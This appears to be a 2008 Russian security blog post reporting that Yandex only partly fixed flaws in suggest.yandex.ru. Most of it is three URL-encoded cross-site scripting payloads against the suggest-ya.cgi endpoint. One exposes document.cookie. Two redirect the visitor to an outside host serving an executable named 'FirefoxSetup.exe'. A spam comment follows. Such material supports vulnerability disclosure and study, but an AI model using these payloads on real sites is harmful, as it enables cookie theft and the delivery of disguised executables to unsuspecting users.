Обновление :: Исправление уязвимостей suggest.yandex.ru
Уязвимости Октябрь 20, 2008
По факту исправлений понятно, что исправлено лишь расщепление HTTP-запроса. Все остальное работает несколько в другом виде.
- http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3E%3C%2F%62%6F%64%79%3E
- http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%62%6F%64%79%3E
- http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%27%72%65%66%72%65%73%68%27%20%63%6F%6E%74%65%6E%74%3D%27%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%6D%65%74%61%3E
По другим примерам аналог находится чуть более сложно.
One Response to “Обновление :: Исправление уязвимостей suggest.yandex.ru”
Оставить комментарий
Вы должны зарегистрироваться, чтобы оставлять комментарии
Октябрь 10th, 2011 at 03:54
“http://en.visors.ru/?p=3936&lol= north@bwgxs3.jump“>.< / a >< / strong >< / em >…
спс :!:…